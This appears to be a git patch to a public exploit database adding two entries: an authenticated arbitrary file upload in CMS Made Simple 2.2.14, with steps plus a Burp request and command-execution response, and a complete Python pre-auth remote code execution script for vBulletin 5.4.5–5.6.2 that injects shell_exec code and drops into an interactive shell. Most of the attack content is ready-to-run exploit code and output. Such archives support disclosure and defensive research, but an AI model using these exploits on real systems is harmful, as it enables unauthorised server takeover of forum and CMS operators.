From a999edcbb650e912ce8d92d023af555609c072b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Aug 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-08-13 2 changes to exploits/shellcodes CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution --- exploits/php/webapps/48742.txt | 53 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/48743.txt | 42 +++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 97 insertions(+) create mode 100644 exploits/php/webapps/48742.txt create mode 100644 exploits/php/webapps/48743.txt diff --git a/exploits/php/webapps/48742.txt b/exploits/php/webapps/48742.txt new file mode 100644 index 000000000..7b35973ef --- /dev/null +++ b/exploits/php/webapps/48742.txt @@ -0,0 +1,53 @@ +# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) +# Google Dork: - +# Date: 2020-07-29 +# Exploit Author: Roel van Beurden +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip +# Version: 2.2.14 +# Tested on: Linux Ubuntu 18.04 +# CVE: N/A + + +1. Description: +---------------------- +CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution. + + +2. Proof of Concept: +---------------------- +- Create .phtml or .ptar file with malicious PHP payload; +- Upload .phtml or .ptar file in the 'File Manager' module; +- Click on the uploaded file to perform remote code execution. + + +3: Example payload: +---------------------- + + + +4a: Burp request: +---------------------- +GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1 +Host: 10.10.10.12 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close + +Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v + +Upgrade-Insecure-Requests: 1 + + +4b: Burp response: +---------------------- +HTTP/1.1 200 OK +Date: Thu, 30 Jul 2020 23:14:47 GMT +Server: Apache/2.4.29 (Ubuntu) +Content-Length: 54 +Connection: close +Content-Type: text/html; charset=UTF-8 + +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/exploits/php/webapps/48743.txt b/exploits/php/webapps/48743.txt new file mode 100644 index 000000000..7dd0c26d1 --- /dev/null +++ b/exploits/php/webapps/48743.txt @@ -0,0 +1,42 @@ +# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution +# Date: 2020-08-09 +# Exploit Author: @zenofex +# Vendor Homepage: https://www.vbulletin.com/ +# Software Link: None +# Version: 5.4.5 through 5.6.2 +# Tested on: vBulletin 5.6.2 on Ubuntu 19.04 +# CVE : None + +# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code +# execution vulnerability caused by incomplete patching of the previous +# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth +# request to execute PHP code on a target vBulletin forum. + +#More info can be found at: +#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ + + +#!/usr/bin/env python3 +# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex + +import argparse +import requests +import sys + +def run_exploit(vb_loc, shell_cmd): + post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd} + r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) + return r.text + +ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') +ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') +ARGS = ap.parse_args() + +while True: + try: + cmd = input("vBulletin5$ ") + print(run_exploit(ARGS.location, cmd)) + except KeyboardInterrupt: + sys.exit("\nClosing shell...") + except Exception as e: + sys.exit(str(e)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 523a166ec..f3274508b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42983,3 +42983,5 @@ id,file,description,date,author,type,platform,port 48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php, 48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java, 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php, +48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php, +48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,